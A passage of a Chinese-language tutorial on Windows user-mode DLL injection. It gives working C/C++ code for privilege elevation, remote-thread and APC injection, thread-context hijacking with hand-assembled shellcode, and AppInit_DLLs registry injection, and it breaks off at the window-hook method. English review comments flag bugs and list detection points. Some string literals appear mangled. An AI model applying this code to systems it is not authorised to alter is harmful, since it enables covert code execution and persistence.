0x01.前言
提到Dll的注入,立馬能夠想到的方法就有很多,比如利用遠程線程、Apc等等,這里我對Ring3層的Dll注入學習做一個總結吧。
我把注入的方法分成六類,分別是:1.創建新線程、2.設置線程上下文,修改寄存器、3.插入Apc隊列、4.修改注冊表、5.掛鉤窗口消息、6.遠程手動實現LoadLibrary。
那么下面就開始學習之旅吧!
0x02.預備工作
在涉及到注入的程序中,提升程序的權限自然是必不可少的,這里我提供了兩個封裝的函數,都可以用于提權。第一個是通過權限令牌來調整權限;第二個是通過ntdll.dll的導出的未文檔化函數RtlAdjustPrivilege來調整權限。
// 傳入參數 SE_DEBUG_NAME,提升到調試權限BOOL GrantPriviledge(WCHAR* PriviledgeName){TOKEN_PRIVILEGES TokenPrivileges, OldPrivileges;DWORD dwReturnLength = sizeof(OldPrivileges);HANDLE TokenHandle = NULL;LUID uID;// 打開權限令牌if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &TokenHandle)){if (GetLastError() != ERROR_NO_TOKEN){return FALSE;}if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)){return FALSE;}}if (!LookupPrivilegeValue(NULL, PriviledgeName, &uID)) // 通過權限名稱查找uID{CloseHandle(TokenHandle);return FALSE;}TokenPrivileges.PrivilegeCount = 1; // 要提升的權限個數TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // 動態數組,數組大小根據Count的數目TokenPrivileges.Privileges[0].Luid = uID;// 在這里我們進行調整權限if (!AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), &OldPrivileges, &dwReturnLength)){CloseHandle(TokenHandle);return FALSE;}// 成功了CloseHandle(TokenHandle);return TRUE;}
緊接著,既然我們要對目標進程注入Dll,那么獲得目標進程的Id是不可或缺的吧,因為OpenProcess是肯定會使用的,這里我也提供了兩種通過目標進程映像名稱獲得進程Id的方法。第一種是最常見的使用TlHelp創建系統的進程快照;第二種是借助Psapi枚舉系列函數,不過這個方法我實現的有缺憾,32位下不能得到64位進程的Id。
// Variant 1: ToolHelp snapshot API.
// Looks up a process id by image name (case-insensitive) using a process snapshot.
// Returns TRUE when a match was written to *ProcessId.
// NOTE(review): *ProcessId is never zeroed here; the final "== 0" test only works
// because the callers shown on this page initialise the out-parameter to 0.
#include <TlHelp32.h>
BOOL GetProcessIdByProcessImageName(IN PWCHAR wzProcessImageName, OUT PUINT32 ProcessId)
{
    HANDLE ProcessSnapshotHandle = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 ProcessEntry32 = { 0 };
    ProcessEntry32.dwSize = sizeof(PROCESSENTRY32); // dwSize must be set before Process32First
    ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // snapshot of every process on the system
    if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    if (Process32First(ProcessSnapshotHandle, &ProcessEntry32)) // first entry
    {
        do
        {
            if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName) == 0) // case-insensitive compare
            {
                *ProcessId = ProcessEntry32.th32ProcessID;
                break; // first match wins; same-named processes are not disambiguated
            }
        } while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));
    }
    CloseHandle(ProcessSnapshotHandle);
    ProcessSnapshotHandle = INVALID_HANDLE_VALUE;
    if (*ProcessId == 0)
    {
        return FALSE;
    }
    return TRUE;
}
// Variant 2: PSAPI enumeration.
// Same contract as above, but resolves each pid's main-module name via PSAPI.
// The author notes a 32-bit build of this variant cannot see 64-bit processes.
// NOTE(review): every process is opened with PROCESS_ALL_ACCESS although only a
// module-name query is performed; any process that refuses that access level is
// silently skipped, so a target running at higher integrity may never be found.
// NOTE(review): GetModuleBaseName's nSize is documented in characters, but
// MAX_PATH * sizeof(WCHAR) is passed for a MAX_PATH-character buffer.
#include <Psapi.h>
BOOL GetProcessIdByProcessImageName(IN PWCHAR wzProcessImageName, OUT PUINT32 ProcessId)
{
    DWORD dwProcessesId[1024] = { 0 }; // fixed capacity: more than 1024 pids are truncated
    DWORD BytesReturned = 0;
    UINT32 ProcessCount = 0;
    // Collect every process id on the system into dwProcessesId
    if (!EnumProcesses(dwProcessesId, sizeof(dwProcessesId), &BytesReturned))
    {
        return FALSE;
    }
    ProcessCount = BytesReturned / sizeof(DWORD);
    // Walk the ids (signed/unsigned comparison: i is INT, ProcessCount is UINT32)
    for (INT i = 0; i < ProcessCount; i++)
    {
        HMODULE ModuleBase = NULL;
        WCHAR wzModuleBaseName[MAX_PATH] = { 0 };
        HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessesId[i]);
        if (ProcessHandle == NULL)
        {
            continue;
        }
        if (EnumProcessModulesEx(ProcessHandle, &ModuleBase, sizeof(HMODULE), &BytesReturned, LIST_MODULES_ALL))
        {
            // Name of the process's first module (its main image)
            GetModuleBaseName(ProcessHandle, ModuleBase, wzModuleBaseName, MAX_PATH * sizeof(WCHAR));
        }
        CloseHandle(ProcessHandle);
        ProcessHandle = NULL;
        if (lstrcmpi(wzModuleBaseName, wzProcessImageName) == 0) // case-insensitive compare
        {
            *ProcessId = dwProcessesId[i];
            break;
        }
    }
    if (*ProcessId == 0)
    {
        return FALSE;
    }
    return TRUE;
}
然后在比如插入Apc隊列、掛起線程等等操作中,需要對目標進程的線程操作,所以獲得線程Id也有必要,同樣的我也提供了兩種通過進程Id獲得線程Id的方法。第一個仍然是使用TlHelp創建系統的線程快照,把所有的線程存入vector模板里(供Apc注入使用);第二個是利用ZwQuerySystemInformation大法,枚舉系統進程信息,這個方法我只返回了一個線程Id,已經夠用了。
// Variant 1: enumerate every thread of the given process id into a vector.
// Returns FALSE only when the snapshot cannot be taken; an empty vector with a
// TRUE result means the pid owns no threads in the snapshot (or does not exist).
#include <vector>
#include <TlHelp32.h>
using namespace std;
BOOL GetThreadIdByProcessId(IN UINT32 ProcessId, OUT vector<UINT32>& ThreadIdVector)
{
    HANDLE ThreadSnapshotHandle = NULL;
    THREADENTRY32 ThreadEntry32 = { 0 };
    ThreadEntry32.dwSize = sizeof(THREADENTRY32);
    ThreadSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); // snapshot of every thread on the system
    if (ThreadSnapshotHandle == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    if (Thread32First(ThreadSnapshotHandle, &ThreadEntry32))
    {
        do
        {
            if (ThreadEntry32.th32OwnerProcessID == ProcessId)
            {
                ThreadIdVector.emplace_back(ThreadEntry32.th32ThreadID); // collect every thread id owned by the target
            }
        } while (Thread32Next(ThreadSnapshotHandle, &ThreadEntry32));
    }
    CloseHandle(ThreadSnapshotHandle);
    ThreadSnapshotHandle = NULL;
    return TRUE;
}
// Variant 2: ZwQuerySystemInformation + SystemProcessInformation.
// Resolves ZwQuerySystemInformation from ntdll at runtime (it is not exported via
// a public import library) and returns the first thread id of the target process.
// SYSTEM_INFORMATION_CLASS, SystemProcessInformation and PSYSTEM_PROCESS_INFO are
// not declared on this page; presumably they come from a local header — confirm.
typedef
NTSTATUS
(NTAPI * pfnZwQuerySystemInformation)(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN UINT32 SystemInformationLength,
    OUT PUINT32 ReturnLength OPTIONAL
);
BOOL GetThreadIdByProcessId(IN UINT32 ProcessId, OUT PUINT32 ThreadId)
{
    BOOL bOk = FALSE;
    NTSTATUS Status = 0;
    PVOID BufferData = NULL;
    PSYSTEM_PROCESS_INFO spi = NULL;
    pfnZwQuerySystemInformation ZwQuerySystemInformation = NULL;
    ZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwQuerySystemInformation");
    if (ZwQuerySystemInformation == NULL)
    {
        return FALSE;
    }
    // NOTE(review): 1 MB is a fixed guess; if the process list needs more, the
    // call below fails and the function returns FALSE instead of retrying.
    BufferData = malloc(1024 * 1024);
    if (!BufferData)
    {
        return FALSE;
    }
    // Author's note: for SystemProcessInformation the buffer must be allocated up
    // front rather than sized by a first query.
    Status = ZwQuerySystemInformation(SystemProcessInformation, BufferData, 1024 * 1024, NULL);
    if (!NT_SUCCESS(Status))
    {
        free(BufferData);
        return FALSE;
    }
    spi = (PSYSTEM_PROCESS_INFO)BufferData;
    // Walk the process list (NextEntryOffset-linked) looking for the target pid
    while (TRUE)
    {
        bOk = FALSE;
        if (spi->UniqueProcessId == (HANDLE)ProcessId)
        {
            bOk = TRUE;
            break;
        }
        else if (spi->NextEntryOffset)
        {
            spi = (PSYSTEM_PROCESS_INFO)((PUINT8)spi + spi->NextEntryOffset);
        }
        else
        {
            break; // end of list: NextEntryOffset == 0
        }
    }
    if (bOk)
    {
        // The loop breaks after the first iteration: only the first thread id is returned.
        // If NumberOfThreads is 0, *ThreadId is left untouched while bOk is still TRUE.
        for (INT i = 0; i < spi->NumberOfThreads; i++)
        {
            // return the first thread id found
            *ThreadId = (UINT32)spi->Threads[i].ClientId.UniqueThread;
            break;
        }
    }
    if (BufferData != NULL)
    {
        free(BufferData);
    }
    return bOk;
}
嗯,目前為止,預備工作差不多完工,那我們就開始正題吧!
0x03.注入方法一 -- 創建新線程
創建新線程,也就是在目標進程里,創建一個線程為我們服務,而創建線程的方法我找到的有三種:1.CreateRemoteThread;2.NtCreateThreadEx;3.RtlCreateUserThread。
基本思路是:1.在目標進程內存空間申請內存;2.在剛申請的內存中寫入Dll完整路徑;3.創建新線程,去執行LoadLibrary,從而完成注入Dll。
ps:這里直接使用從自己加載的kernel32模塊導出表中獲得LoadLibrary地址,是因為一般情況下,所有進程加載這類系統庫在內存中的地址相同!
因為只是創線程所使用的函數不一樣,所以下面的代碼隨便放開一個創線程的步驟,屏蔽其他兩個,都是可以成功的,這里我放開的是NtCreateThreadEx。
// Prototype for the undocumented ntdll export NtCreateThreadEx (resolved at runtime below).
typedef NTSTATUS(NTAPI* pfnNtCreateThreadEx)(
    OUT PHANDLE hThread,
    IN ACCESS_MASK DesiredAccess,
    IN PVOID ObjectAttributes,
    IN HANDLE ProcessHandle,
    IN PVOID lpStartAddress,
    IN PVOID lpParameter,
    IN ULONG Flags,
    IN SIZE_T StackZeroBits,
    IN SIZE_T SizeOfStackCommit,
    IN SIZE_T SizeOfStackReserve,
    OUT PVOID lpBytesBuffer
);
#define NT_SUCCESS(x) ((x) >= 0)
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
// Prototype for the undocumented ntdll export RtlCreateUserThread (used only in the commented-out variant).
typedef NTSTATUS(NTAPI * pfnRtlCreateUserThread)(
    IN HANDLE ProcessHandle,
    IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
    IN BOOLEAN CreateSuspended,
    IN ULONG StackZeroBits OPTIONAL,
    IN SIZE_T StackReserve OPTIONAL,
    IN SIZE_T StackCommit OPTIONAL,
    IN PTHREAD_START_ROUTINE StartAddress,
    IN PVOID Parameter OPTIONAL,
    OUT PHANDLE ThreadHandle OPTIONAL,
    OUT PCLIENT_ID ClientId OPTIONAL
);
// Method 1: remote thread.  Allocates a buffer in the target, writes the DLL path
// (global DllFullPath, narrow string — declared elsewhere), then starts a thread
// in the target at this process's LoadLibraryA address.  The author's assumption
// (see the prose above) is that kernel32 is mapped at the same address in both
// processes, which also requires both to have the same bitness.
// From a defender's view all three thread-creation variants converge on the same
// observable: a thread created from another process whose start address is
// LoadLibrary (e.g. Sysmon's CreateRemoteThread event, kernel thread-creation
// callbacks); this is the classic detection point for the technique.
// NOTE(review): the OpenProcess result is never checked for NULL, the
// WriteProcessMemory result (bOk) is ignored, NtCreateThreadEx's status is not
// examined, and the WAIT_FAILED path returns without closing either handle.
BOOL InjectDll(UINT32 ProcessId)
{
    HANDLE ProcessHandle = NULL;
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    // Reserve memory in the target process for the full DLL path
    UINT32 DllFullPathLength = (strlen(DllFullPath) + 1);
    PVOID DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (DllFullPathBufferData == NULL)
    {
        CloseHandle(ProcessHandle);
        return FALSE;
    }
    // Copy DllFullPath into the buffer just allocated
    SIZE_T ReturnLength;
    BOOL bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, strlen(DllFullPath) + 1, &ReturnLength);
    LPTHREAD_START_ROUTINE LoadLibraryAddress = NULL;
    HMODULE Kernel32Module = GetModuleHandle(L"Kernel32");
    LoadLibraryAddress = (LPTHREAD_START_ROUTINE)GetProcAddress(Kernel32Module, "LoadLibraryA");
    pfnNtCreateThreadEx NtCreateThreadEx = (pfnNtCreateThreadEx)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateThreadEx");
    if (NtCreateThreadEx == NULL)
    {
        CloseHandle(ProcessHandle);
        return FALSE;
    }
    HANDLE ThreadHandle = NULL;
    // 0x1FFFFF #define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF)
    NtCreateThreadEx(&ThreadHandle, 0x1FFFFF, NULL, ProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryAddress, DllFullPathBufferData, FALSE, NULL, NULL, NULL, NULL);
    /*
    pfnRtlCreateUserThread RtlCreateUserThread = (pfnRtlCreateUserThread)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlCreateUserThread");
    HANDLE ThreadHandle = NULL;
    NTSTATUS Status = RtlCreateUserThread(ProcessHandle, NULL, FALSE, 0, 0, 0, LoadLibraryAddress, DllFullPathBufferData, &ThreadHandle, NULL);
    */
    /*
    HANDLE ThreadHandle = CreateRemoteThread(ProcessHandle, NULL, 0, LoadLibraryAddress, DllFullPathBufferData, 0, NULL); // CreateRemoteThread variant
    */
    if (ThreadHandle == NULL)
    {
        CloseHandle(ProcessHandle);
        return FALSE;
    }
    // Block until the remote LoadLibraryA call returns
    if (WaitForSingleObject(ThreadHandle, INFINITE) == WAIT_FAILED)
    {
        return FALSE;
    }
    CloseHandle(ProcessHandle);
    CloseHandle(ThreadHandle);
    return TRUE;
}
0x04.注入方法二 -- 設置線程上下文
設置線程上下文的主要目的是讓目標進程的某一線程轉去執行我們的代碼,然后再回來做他該做的事,而我們的代碼,就是一串由匯編硬編碼組成的ShellCode。
這串ShellCode做了三件事:1.傳入Dll完整路徑參數;2.呼叫LoadLibrary函數地址;3.返回原先的Eip或Rip。
這里我選用的呼叫指令是ff 15 和 ff 25,在32位下為跳轉到15(25)指令后面字節碼對應地址里面存放的地址,在64位下15(25)指令后面四字節存放的是偏移,該跳轉為跳轉到換算出來的地址里面存放的地址,這里我把偏移寫成0,以便于計算。
#ifdef _WIN64
// 64-bit variant (author: tested; an earlier bug has been fixed).
// Position-dependent stub that Inject() copies into the target process and
// patches in place: the [+N] annotations are byte offsets from the start of the
// array and must stay in sync with the offsets Inject() writes (+7, +13, +27,
// +35, +43).  The trailing zero bytes are slots, not instructions.
/*
0:019> u 0x000002b5d5f80000
000002b5`d5f80000 4883ec28 sub rsp,28h
000002b5`d5f80004 488d0d20000000 lea rcx,[000002b5`d5f8002b]
000002b5`d5f8000b ff1512000000 call qword ptr [000002b5`d5f80023]
000002b5`d5f80011 4883c428 add rsp,28h
000002b5`d5f80015 ff2500000000 jmp qword ptr [000002b5`d5f8001b]
*/
UINT8 ShellCode[0x100] = {
    0x48,0x83,0xEC,0x28, // sub rsp ,28h
    0x48,0x8D,0x0d, // [+4] lea rcx,
    0x00,0x00,0x00,0x00, // [+7] DllNameOffset = [+43] - [+4] - 7
    // call [rip+disp32]: disp points at the slot holding the target address
    0xff,0x15, // [+11]
    0x00,0x00,0x00,0x00, // [+13]
    0x48,0x83,0xc4,0x28, // [+17] add rsp,28h
    // jmp [rip+disp32]: likewise, through the saved-RIP slot
    0xff,0x25, // [+21]
    0x00,0x00,0x00,0x00, // [+23] LoadLibraryAddressOffset
    // slot: saved original RIP
    0x00,0x00,0x00,0x00, // [+27]
    0x00,0x00,0x00,0x00, // [+31]
    // slot: LoadLibrary address
    0x00,0x00,0x00,0x00, // [+35]
    0x00,0x00,0x00,0x00, // [+39]
    // slot: full DLL path (filled by Inject())
    // 0x00,0x00,0x00,0x00, // [+43]
    // 0x00,0x00,0x00,0x00 // [+47]
    // ......
};
#else
// 32-bit variant (author: tested; re-injectable together with the rewritten DLL).
// Same slot convention as above; Inject() writes offsets +3, +9, +17, +21, +25, +29.
/*
0:005> u 0x00ca0000
00000000`00ca0000 60 pusha
00000000`00ca0001 9c pushfq
00000000`00ca0002 681d00ca00 push 0CA001Dh
00000000`00ca0007 ff151900ca00 call qword ptr [00000000`01940026]
00000000`00ca000d 9d popfq
00000000`00ca000e 61 popa
00000000`00ca000f ff251500ca00 jmp qword ptr [00000000`0194002a]
*/
UINT8 ShellCode[0x100] = {
    0x60, // [+0] pusha
    0x9c, // [+1] pushf
    0x68, // [+2] push
    0x00,0x00,0x00,0x00, // [+3] ShellCode +
    0xff,0x15, // [+7] call
    0x00,0x00,0x00,0x00, // [+9] LoadLibrary Addr Addr
    0x9d, // [+13] popf
    0x61, // [+14] popa
    0xff,0x25, // [+15] jmp
    0x00,0x00,0x00,0x00, // [+17] jmp eip
    // slot: saved original EIP
    0x00,0x00,0x00,0x00, // [+21]
    // slot: LoadLibrary address
    0x00,0x00,0x00,0x00, // [+25]
    // slot: DllFullPath
    0x00,0x00,0x00,0x00 // [+29]
};
#endif
整個注入過程由這些步驟組成:在目標進程申請內存(可執行內存) ---> 填充ShellCode需要的地址碼 ---> 將ShellCode寫入申請的內存 ---> SuspendThread(掛起線程)--->GetThreadContext(獲得線程上下文)---> 修改Context的Eip或Rip為ShellCode首地址 ---> SetThreadContext(設置剛修改過的Context)---> ResumeThread(恢復線程執行)。
// Method 2: thread-context hijack.  Suspends one target thread, patches the
// global ShellCode array (path, LoadLibrary address, saved Rip/Eip, operand
// displacements), writes it into the target and redirects the thread to it.
// Globals used but declared elsewhere: ShellCode, LoadLibraryWAddress and a
// wide-string DllFullPath (note the strlen-based narrow DllFullPath in the
// other listings on this page is a different program).
// Observable side effects for defenders: SuspendThread/SetThreadContext on a
// thread of another process, plus a new executable private region whose first
// bytes are the stub above.
// NOTE(review): the OpenThread/OpenProcess and SuspendThread results are not
// checked; the early returns inside the #ifdef branches leave the target
// thread suspended and both handles open; and the memcpy of the path into
// ShellCode+43 / ShellCode+29 has no bound against sizeof(ShellCode) (a
// MAX_PATH wide string is 520 bytes, the array is 256).
// NOTE(review): the "/n" and "/r/n" in the printf strings look like
// extraction-mangled "\n" / "\r\n" — verify against the original source.
BOOL Inject(IN UINT32 ProcessId, IN UINT32 ThreadId)
{
    BOOL bOk = FALSE;
    CONTEXT ThreadContext = { 0 };
    PVOID BufferData = NULL;
    HANDLE ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadId);
    HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    // Suspend the target thread first
    SuspendThread(ThreadHandle);
    ThreadContext.ContextFlags = CONTEXT_ALL;
    if (GetThreadContext(ThreadHandle, &ThreadContext) == FALSE)
    {
        CloseHandle(ThreadHandle);
        CloseHandle(ProcessHandle);
        return FALSE;
    }
    BufferData = VirtualAllocEx(ProcessHandle, NULL, sizeof(ShellCode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (BufferData != NULL)
    {
        if (LoadLibraryWAddress != NULL)
        {
#ifdef _WIN64
            // ShellCode+43: full DLL path (wide)
            PUINT8 v1 = ShellCode + 43;
            memcpy(v1, DllFullPath, (wcslen(DllFullPath) + 1) * sizeof(WCHAR));
            // rip-relative displacement for the lea at +4 (7-byte instruction)
            UINT32 DllNameOffset = (UINT32)(((PUINT8)BufferData + 43) - ((PUINT8)BufferData + 4) - 7);
            *(PUINT32)(ShellCode + 7) = DllNameOffset;
            // ShellCode+35: LoadLibrary address
            *(PUINT64)(ShellCode + 35) = (UINT64)LoadLibraryWAddress;
            // rip-relative displacement for the call at +11 (6-byte instruction)
            UINT32 LoadLibraryAddressOffset = (UINT32)(((PUINT8)BufferData + 35) - ((PUINT8)BufferData + 11) - 6);
            *(PUINT32)(ShellCode + 13) = LoadLibraryAddressOffset;
            // saved RIP (the jmp at +21 has displacement 0, so it reads +27)
            *(PUINT64)(ShellCode + 27) = ThreadContext.Rip;
            if (!WriteProcessMemory(ProcessHandle, BufferData, ShellCode, sizeof(ShellCode), NULL))
            {
                return FALSE;
            }
            ThreadContext.Rip = (UINT64)BufferData;
#else
            PUINT8 v1 = ShellCode + 29;
            memcpy((char*)v1, DllFullPath, (wcslen(DllFullPath) + 1) * sizeof(WCHAR)); // DLL name to load
            *(PUINT32)(ShellCode + 3) = (UINT32)BufferData + 29; // push operand: remote address of the path
            *(PUINT32)(ShellCode + 25) = LoadLibraryWAddress; // LoadLibrary address into the shellcode
            *(PUINT32)(ShellCode + 9) = (UINT32)BufferData + 25; // patch the call operand with the remote address of the LoadLibrary slot
            //////////////////////////////////
            *(PUINT32)(ShellCode + 21) = ThreadContext.Eip;
            *(PUINT32)(ShellCode + 17) = (UINT32)BufferData + 21; // patch the jmp operand with the remote address of the saved-EIP slot
            if (!WriteProcessMemory(ProcessHandle, BufferData, ShellCode, sizeof(ShellCode), NULL))
            {
                printf("write Process Error/n");
                return FALSE;
            }
            ThreadContext.Eip = (UINT32)BufferData;
#endif
            if (!SetThreadContext(ThreadHandle, &ThreadContext))
            {
                printf("set thread context error/n");
                return FALSE;
            }
            ResumeThread(ThreadHandle);
            printf("ShellCode 注入完成/r/n");
        }
    }
    // Note: reached with the thread still suspended when BufferData or
    // LoadLibraryWAddress was NULL, yet TRUE is returned.
    CloseHandle(ThreadHandle);
    CloseHandle(ProcessHandle);
    return TRUE;
}
0x05.插入Apc隊列
Ring3層的Apc注入是不太穩定的,我的做法就是暴力的向目標進程的所有線程的UserMode Apc隊列(線程有兩個Apc隊列:Kernel和User)上插入Apc對象,等待他去執行該Apc里注冊的函數。而只有當線程處于alertable狀態時,才會查看Apc隊列是否有需要執行的注冊函數。
ps:正是因為不知道哪個線程會去處理Apc,所以感覺Ring3層Apc注入不如其他方法好使,不過Ring0層Apc注入還是比較穩定的。之前測試xp和win10都成功,win7下注explorer進程總是崩潰,后來捯飭半天,發現遍歷線程的時候從后往前遍歷著插入就不會崩潰Orz
// Method 3: user-mode APC.  The caller (main, shown as a fragment with "......"
// standing for the omitted parts) queues one APC per thread of the target, walking
// the thread list backwards — the author reports this ordering avoided crashes.
int main()
{
    ......
    ThreadCount = ThreadIdVector.size();
    for (INT i = ThreadCount - 1; i >= 0; i--)
    {
        UINT32 ThreadId = ThreadIdVector[i];
        InjectDllByApc(ProcessId, ThreadId);
    }
    ......
}
// Queues LoadLibraryA(DllFullPath) as a user-mode APC on one thread of the target.
// DllFullPathBufferData is a global (declared elsewhere) so the remote buffer is
// allocated once and reused across threads; DllFullPath is a narrow global.
// The APC only runs when that thread enters an alertable wait, which is why the
// author describes the method as unreliable.  Defender observable: QueueUserAPC
// from another process, with LoadLibrary as the APC routine.
// NOTE(review): __except(EXCEPTION_CONTINUE_EXECUTION) does not swallow a fault,
// it re-runs the faulting instruction; EXCEPTION_EXECUTE_HANDLER is the value
// that matches the empty handler's intent.  The QueueUserAPC result and the
// OpenThread/OpenProcess results are also never checked.
BOOL InjectDllByApc(IN UINT32 ProcessId, IN UINT32 ThreadId)
{
    BOOL bOk = 0;
    HANDLE ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadId);
    HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    UINT_PTR LoadLibraryAddress = 0;
    SIZE_T ReturnLength = 0;
    UINT32 DllFullPathLength = (strlen(DllFullPath) + 1);
    // DllFullPathBufferData is global: allocate once
    if (DllFullPathBufferData == NULL)
    {
        // allocate in the target
        DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (DllFullPathBufferData == NULL)
        {
            CloseHandle(ProcessHandle);
            CloseHandle(ThreadHandle);
            return FALSE;
        }
    }
    // Re-write every time in case an earlier write failed
    bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, strlen(DllFullPath) + 1,&ReturnLength);
    if (bOk == FALSE)
    {
        CloseHandle(ProcessHandle);
        CloseHandle(ThreadHandle);
        return FALSE;
    }
    LoadLibraryAddress = (UINT_PTR)GetProcAddress(GetModuleHandle(L"Kernel32.dll"), "LoadLibraryA");
    if (LoadLibraryAddress == NULL)
    {
        CloseHandle(ProcessHandle);
        CloseHandle(ThreadHandle);
        return FALSE;
    }
    __try
    {
        QueueUserAPC((PAPCFUNC)LoadLibraryAddress, ThreadHandle, (UINT_PTR)DllFullPathBufferData);
    }
    __except (EXCEPTION_CONTINUE_EXECUTION)
    {
    }
    CloseHandle(ProcessHandle);
    CloseHandle(ThreadHandle);
    return TRUE;
}
0x06.修改注冊表
注冊表注入算得上是全局Hook了吧,畢竟新創建的進程在加載User32.dll時,都會自動調用LoadLibrary去加載注冊表中某個表項鍵值里寫入的Dll路徑。
我們關心的這個注冊表項鍵是:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows,我們要設置的鍵值是AppInit_DLLs = “Dll完整路徑”,LoadAppInit_DLLs = 1(讓系統使用這個注冊表項)
ps:由于注入的Dll在進程創建的早期,所以在Dll中使用函數要格外小心,因為有的庫可能還沒加載上。
// Method 4: AppInit_DLLs.  Writes this program's directory + NormalDll.dll into
// HKLM\...\Windows NT\CurrentVersion\Windows\AppInit_DLLs, sets LoadAppInit_DLLs
// to 1, waits for a keypress, then clears both values again.  Requires
// administrative rights (KEY_ALL_ACCESS on HKLM); on modern Windows with Secure
// Boot the AppInit mechanism is disabled, so this is mainly a legacy technique.
// Both values are persistent, machine-wide settings that defenders routinely
// monitor (registry change auditing / EDR rules on this key).
// NOTE(review): the "//" in the subkey and file-name literals and the "/r/n" in
// the printf look like extraction-mangled backslashes — verify against the source.
// NOTE(review): the RegQueryValueExW results are never checked and
// dwReturnLength is never reset to sizeof(ValueData), so the queries only
// serve to pick up the existing value type; if the value is absent dwValueType
// stays 0 (REG_NONE) and is written back as such.  The previous AppInit_DLLs
// content is never saved, so the "restore" step writes an empty value rather
// than the original, and hKey is never closed (RegCloseKey).
int main()
{
    LSTATUS Status = 0;
    WCHAR* wzSubKey = L"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Windows";
    HKEY hKey = NULL;
    // Open the key
    Status = RegOpenKeyExW(HKEY_LOCAL_MACHINE, // root key
        wzSubKey, // subkey name
        0, // reserved, 0
        KEY_ALL_ACCESS, // access
        &hKey); // receives the key handle
    if (Status != ERROR_SUCCESS)
    {
        return 0;
    }
    WCHAR* wzValueName = L"AppInit_DLLs";
    DWORD dwValueType = 0;
    UINT8 ValueData[MAX_PATH] = { 0 };
    DWORD dwReturnLength = 0;
    // Query the existing value (only its type is used afterwards)
    Status = RegQueryValueExW(hKey, // key handle
        wzValueName, // value name
        NULL, // reserved
        &dwValueType, // data type
        ValueData, // data
        &dwReturnLength);
    WCHAR wzDllFullPath[MAX_PATH] = { 0 };
    GetCurrentDirectoryW(MAX_PATH, wzDllFullPath);
#ifdef _WIN64
    wcscat_s(wzDllFullPath, L"//x64NormalDll.dll");
#else
    wcscat_s(wzDllFullPath, L"//x86NormalDll.dll");
#endif
    // Set AppInit_DLLs to the DLL path
    Status = RegSetValueExW(hKey,
        wzValueName,
        NULL,
        dwValueType,
        (CONST BYTE*)wzDllFullPath,
        (lstrlen(wzDllFullPath) + 1) * sizeof(WCHAR));
    if (Status != ERROR_SUCCESS)
    {
        return 0;
    }
    wzValueName = L"LoadAppInit_DLLs";
    DWORD dwLoadAppInit = 1;
    // Query (for the type) …
    Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);
    // … then enable the mechanism
    Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)&dwLoadAppInit, sizeof(DWORD));
    if (Status != ERROR_SUCCESS)
    {
        return 0;
    }
    printf("Input Any Key To Resume/r/n");
    getchar();
    getchar();
    // Restore: disable LoadAppInit_DLLs and blank AppInit_DLLs
    dwLoadAppInit = 0;
    Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);
    Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)&dwLoadAppInit, sizeof(DWORD));
    wzValueName = L"AppInit_DLLs";
    ZeroMemory(wzDllFullPath, (lstrlen(wzDllFullPath) + 1) * sizeof(WCHAR));
    Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);
    Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)wzDllFullPath, 0);
    return 0;
}
0x07.掛鉤窗口消息
掛鉤窗口消息使用了MS提供的一個API接口SetWindowsHookEx,他的工作原理是給帶窗口的目標進程的某個線程的某個消息掛鉤上我們Dll導出的函數,一旦消息觸發,則導出函數就會被調用。前面學習到的幾種方法歸根結底是調用了LoadLibrary,而這個方法并沒有。
// Method 5: SetWindowsHookEx.  Injector side: load the DLL into this process,
